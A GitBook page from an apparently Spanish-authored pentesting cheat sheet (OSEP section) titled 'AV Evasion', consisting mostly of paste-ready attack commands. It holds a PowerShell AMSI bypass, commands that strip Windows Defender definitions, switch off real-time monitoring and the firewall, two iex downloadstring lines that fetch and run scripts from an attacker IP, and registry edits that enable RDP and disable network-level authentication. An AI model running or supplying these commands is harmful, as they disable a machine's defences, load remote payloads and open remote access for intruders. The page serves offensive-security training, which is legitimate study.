Awesome Hackpuntes
  • Intro
  • My CVE
  • Exploit-DB
    • XMLBlueprint <= 16.191112 - XML External Entity Injection
    • Easy XML Editor <= 1.7.8 - XML External Entity Injection
    • winrar 5.80 64bit - Denial of Service
    • rConfig 3.9.2 - Remote Code Execution
    • XML Notepad 2.8.0.4 - XML External Entity Injection
    • IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path
  • OWASP - EN
    • OWASP: Testing guide checklist
  • OWASP - ES
    • [INFO] RECOPILACIÓN DE INFORMACIÓN
    • [CONFIG] GESTIÓN DE CONFIGURACIÓN E IMPLEMENTACIÓN
    • OWASP: Guía de pruebas
  • Page 1
  • 🕵️OSEP Cheatsheet
    • Checklist
    • Online Tools
    • AV Evasion
    • File transfer
    • Exfiltrate Data
    • Interesting files
    • Network Forwarding
    • Tools
    • CRTO Cheat Sheet
    • Page
    • Page 3
    • Page 4
  • 📱Mobile Pentesting
  • 🤖Android
    • Page 2
  • 💸iOS
    • How to extract IPA from iOS device
Powered by GitBook
On this page
  • AMSI
  • Disable AV Defender
  • RDP
  • Disable NLA (Autenticación a nivel de red) para conectar por RDP sin problemas
  • Check PPL
  • APP Locker

Was this helpful?

  1. OSEP Cheatsheet

AV Evasion

AMSI

amsi.txt

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);

Disable AV Defender

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true 
NetSh Advfirewall set allprofiles state off 
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring " /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring " /t REG_DWORD /d 1 /f
iex(new-object net.webclient).downloadstring('http://<attacker-ip>/DefendersDeath.ps1')
iex(new-object net.webclient).downloadstring('http://<attacker-ip>/FuckDefender.ps1')

RDP

Allow remote access

netsh firewall set opmode disable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Restricted admin rdp

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0

Disable NLA (Autenticación a nivel de red) para conectar por RDP sin problemas

reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

Check PPL

Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"

APP Locker

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
PreviousOnline ToolsNextFile transfer

Last updated 1 year ago

Was this helpful?

🕵️